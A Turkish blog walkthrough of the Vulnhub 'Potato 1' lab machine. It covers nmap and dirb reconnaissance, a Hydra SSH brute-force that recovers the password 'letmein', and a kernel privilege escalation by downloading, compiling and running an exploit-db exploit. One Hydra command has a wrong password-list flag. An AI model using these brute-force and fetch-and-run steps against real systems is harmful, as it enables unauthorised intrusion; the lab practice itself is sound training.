Potato 1 (SunCSR)


Potato 1 (SunCSR) Makine Çözümü


Vulnhub Potato 1 makine çözümü.

Önce makineyi kurulumunu yapın, her hangi bir sorun yaşamadığınızdan emin olun.


Bilgi Toplama

Bilgi toplamaya geçmeden önce makinenin IP adresini bulmalısınız. IP adresini bulmak için çeşitli yöntemler var ben nmap ile pingleyerek buldum, bu kısmı yazıya koymayacağım.

Öncelikle nmap ile makineyi tarıyoruz:

$ nmap 192.168.1.4 -T5 -p- -A >> sonuc
Sonuçlar;
Nmap scan report for 192.168.1.4
Host is up (0.00036s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Potato
7120/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b1:a8:49:bc:75:01:97:10:da:6a:fa:79:2f:12:41:30 (DSA)
|   2048 0d:6c:93:2a:1b:6c:10:bb:d4:01:4d:9c:42:34:36:df (RSA)
|   256 fc:96:d8:e5:a7:aa:d2:46:9b:00:bd:f2:be:45:cf:b5 (ECDSA)
|_  256 e3:b0:57:45:d3:83:44:45:af:3a:99:94:f8:25:a4:6c (ED25519)
MAC Address: 08:00:27:34:97:D8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.1.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.67 seconds
Bu çıktıya göre makinede görünen 2 adet açık port var (80HTTP, 7120SSH). Ayrıca makinadaki kernelin sürümü 3.x veya 4.x.

HTTP – Web Sayfasının İncelenmesi

Makinenin 80.portuna bağlandığımızda bizi çok şık bir sayfa karşılıyor.


Hiç vakit kaybetmeden sayfayı tersyüz edelim.


İşimize yarayacak herhangi bir bilgi yok gibi. Buradan sonra 
dirb veya nikto ile site üzerinde sayfa taramasına başlayabiliriz. Bu işlem için ben dirb aracını tercih ettim.
$ dirb http://192.168.1.4
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Sep 16 20:57:32 2020
URL_BASE: http://192.168.1.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.4/ ----
+ http://192.168.1.4/index.html (CODE:200|SIZE:654)
+ http://192.168.1.4/info.php (CODE:200|SIZE:87483)
+ http://192.168.1.4/server-status (CODE:403|SIZE:291)
-----------------
END_TIME: Wed Sep 16 20:57:34 2020
DOWNLOADED: 4612 - FOUND: 3
İşe yarar fazla bir sayfa da yok. info.php sayfasında nelerin olup gittiğini kontrol edelim.



Burada da mevcut php sürümü ile ilgili çeşitli bilgiler yer alıyor. Sayfadaki bilgileri detaylıca inceledikten sonra buradan da işe yarar bir şey çıkmayınca yüzümüzü ssh‘a çeviriyoruz.

Saldırı

SSH – BruteForce

Aklıma ilk gelen 7120.Portta bulunan bu ssh servisine bir bruteforce başlatmak oldu. BruteForce esnasında servisin versiyon bilgilerini aratarak daha önce exploit edilip edilmediğini araştırdım fakat yeterli sonuçlara varamadım.

KB-VULN1‘in çözümünde tool olarak Metasploit’i kullanmıştım bu seferki saldırıda Hydra’yı kullandım , saldırıya başlamadan önce şu adımları izleyerek hazırlığınızı yapın:

  • BruteForce için tool’un bulunması (Kullanılan: Hydra[CLI])
  • Saldırıda kullanılacak wordlistin seçilmesi (Kullanılan: Rockyou)
  • Hedef ile olan bağlantının test edilmesi
  • Saldırı için toolun hazırlanması
  • Saldırı

Saldırıya başlamadan önce bir kullanıcı adı seçilmeli. Saldırı için kullanıcı adı olarak aklıma ilke gelen (ve mantıklı olan) potato kullanıcı adını tercih ettim.

$ hydra -l potato -p /usr/share/wordlists/rockyou.txt 192.168.1.4 -t 4 ssh -s 7120

Yukarıdaki kodu çalıştırarak saldırıyı başlattım.

Kısa bir süre sonra şifre kırıldı, letmein. Şifreyi aldıktan sonra ssh ile makineye bağlantı kurun.

Yetki Yükseltme – Kernel Privilege Escalation

Ssh ile makineye bağlandıktan sonra yetki yükseltmek için kernel hakkında bilgi toplamaya başladım.

$ uname -a

Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Kernel hakkında kısa bir privilege escalatin exploit araştırması yaptım ve exploit-db‘de ihtiyacım olan kodu buldum. Bundan sonra yapılan işlemler gayet basit.

Sırasıyla:

  • tmp konumuna git
  • wget ile exploiti al
  • gcc ile derle
  • derlenmiş programı çalıştır

Makine’nin Çözülmesi

Yetkiyi yükselttikten sonra root dizinine giderek flag’i alabilirsiniz.

Yorumlar

Bu blogdaki popüler yayınlar

Maltego Nedir? Nasıl Kullanılır?

Wireshark ile SSH Analizi

Bind Shell ve Reverse Shell Nedir?